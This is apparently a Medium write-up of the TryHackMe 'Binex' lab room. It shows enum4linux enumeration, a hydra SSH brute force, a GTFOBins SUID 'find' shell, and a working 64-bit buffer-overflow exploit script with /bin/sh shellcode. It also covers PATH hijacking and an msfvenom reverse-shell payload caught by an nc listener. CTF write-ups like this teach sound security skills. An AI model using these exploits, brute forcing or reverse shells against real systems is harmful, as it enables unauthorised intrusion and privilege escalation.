Binex TryHackme Writeup

By Shamsher khan This is a Writeup of Tryhackme room “Binex

https://tryhackme.com/room/binex

Room link: https://tryhackme.com/room/binex
Note: This room is for Premium Members Only. who purchased THM premium membership.

Topics

  • Network Enumeration
  • Linux Enumeration
  • SMB Enumeration
  • Brute Forcing (SSH)
  • Abusing SUID/GUID
  • Buffer Overflow
  • Exploiting PATH Variable

Enumeration

The hint showed that the longest username in RID range 1000–1003 has an insecure password. We then run enum4linux to enumerate the users.

enum4linux -a 10.10.156.34

So now we have users

kel, des, tryhackme, noentry

Now let’s get access to the system via this user by brute-forcing the SSH service Using hydra tool.

hydra -l tryhackme -P rockyou.txt ssh://10.10.156.34

SSH

ssh tryhackme@10.10.156.34

The next step is to gain the permissions of the user des.
Are there any setuid binaries by des?

find / -type f -perm -u=s -user des -ls 2>/dev/null

We can execute the find command as the user des.

Let’s have a look at Gtfobins if this can be exploited in order to give us a shell.

https://gtfobins.github.io/gtfobins/find/#suid
/usr/bin/find . -exec /bin/sh -p \; -quit

We are still the user tryhackme but we have gained an effective user and ID of des

Let’s Switch our user to des

Task 3. Buffer Overflow :: Binary 2

ssh des@10.10.156.34

Looking at the home directory, we see flag.txt and an executable bof and its corresponding bof.c source code. Also, we find that bof actually belongs to user kel and that its SUID bit is set. We can use this to pivot to become kel.

This code looks like it is vulnerable to a buffer overflow vulnerability. The user can input 1000 bytes
even though the buffer is 600 bytes. This means that we can overflow into other areas of the stack.
Executing the program, just like the source code tells us, it will just echo back a string to stdout.

Let’s Transfer this file in Attacker Machine and supply it with 1000 bytes and see if it crashes. If it crashes we can verify that it can exploited.

python -c 'print("A" * 1000)' | ./bof

It turns out it is susceptible to buffer overflow exploitation!

Through trial and error, we find that the program crashes with an input of 700 characters.

For this task i will use gdb-peda, you can check out this articles for peda installation

However, RIP is not overwritten here.

If we take a look at the registers, we find RSP is pointing to the user buffer.

We can use RBP to compute for the offset to the RIP for this case here.

The above means that the offset to RIP overwrite is 608 + 8 bytes. We can test this by:

Using gdb-peda, we can send eip.txt to bof.

RIP is not overwritten as we hoped. However, RBP is overwritten as expected though.

We find bof wants to return to the RSP (“CCCCCCCCCC”).

The reason why RIP is not 0x4343434343434343 is because most of the addresses are 6-bytes and not 8. Let’s try reducing the number of “C”s.

python -c 'print "A"*608 + "B"*8 + "C"*6 +"\x00"*2' > eip.txt

So now we know that RIP can be overwritten! We also know that prior to the return, the RSP is 0x7fffffffe010. We can have a very large NOP sled at the start of the buffer. Let’s try with the following script:

from struct import pack
buf="\xcc"*8
payload="\x90"*400
payload += buf
payload += "A" * (208 -len(buf))
payload +="B" *8
payload += pack("<Q", 0x7fffffffe010)
print payload

We then test this out as follows:

As shown above, execution breaks at the int 3 instruction!

Using the provided shellcode and the tweaking the original script a little, we get:

\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05

This is our final exploit

from struct import pack
#buf="\xcc"*8
buf="\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
payload="\x90"*400
payload += buf
payload += "A" * (208 -len(buf))
payload +="B" *8
payload += pack("<Q", 0x7fffffffe300)
print payload

Task 4. PATH Manipulation :: Binary 3

Looking at /home/kel directory, we find a file named “exe”. Looking at the source code, we see that exe calls “ps”. We can manipulate the PATH variable such that it calls a file we own.

The program calls the system command ps . the system searches the ps command in the directories from PATH variable. So we can create a file named ps which executes a shell. We add the path to this file at the start of the PATH variable so the system uses our created file .

if you want explore this topic .you read from here

https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

Note:- Another Method for Binary 2

There is an executable file called bof with the SUID bit and the owner kel and the source
code in bof.c. So the task is to exploit a buffer overflow. (For more information on buffer
overflow take a look here: https://medium.com/@buff3r/basic-buffer-overflow-on-64-bit-architecture-3fb74bab3558

gdb bof

We can use GDB to analyze registers of the application. So first run gdb bof
The application asks you to input a string (“Enter some string”). So try out a long input to
crash the program e.g. 1000 x “A”. You can do this in GDB with the following command:

run < <(python -c 'print("A"*1000)')

After that the program crashes with a segmentation fault and we can analyze the registers.
We see the rbp (base pointer) is overwritten with 0x4141… which is our input. (0x41 =”A”) Analyze the stack with this command: x/100x $rsp and x/100x $rsp-700

We can see that our “A”s (0x41) are starting there. Chose an address at the beginning to where we will jump later. (e.g. 0x7fffffffe2fc)
After that we also need the offset to where we place the selected address so the program jumps to our shellcode. To get the offset you can generate a pattern with pattern_create.rb.
Now run the program and paste the pattern as input.

msf-pattern_create -l 1000

After that the rbp (base pointer) is overwritten with the pattern. Take the content from the rbp
(4134754133754132) and calculate the offset with pattern_offset.rb.

Finally you need a shell code. The shellcode in the task did not worked well for me and I do not know why. So I used msfvenom to create my own shellcode with a reverse-shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.2.12.26 LPORT=4444 'x00' -f python

I used a python script (bo.py) on the machine to calculate the lengths and create the final payload as shown here:

Transfer the paylaod into deployed machine

Start a listener (nc -lvp 4444) and execute bof with our payload outside of GDB like this:

./bof < <(python payload.py)

This gives me a reverse-shell with permissions of user kel from where we can grab his SSH credentials in his home directory and the next flag.

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

--

--

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Shamsher khan

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer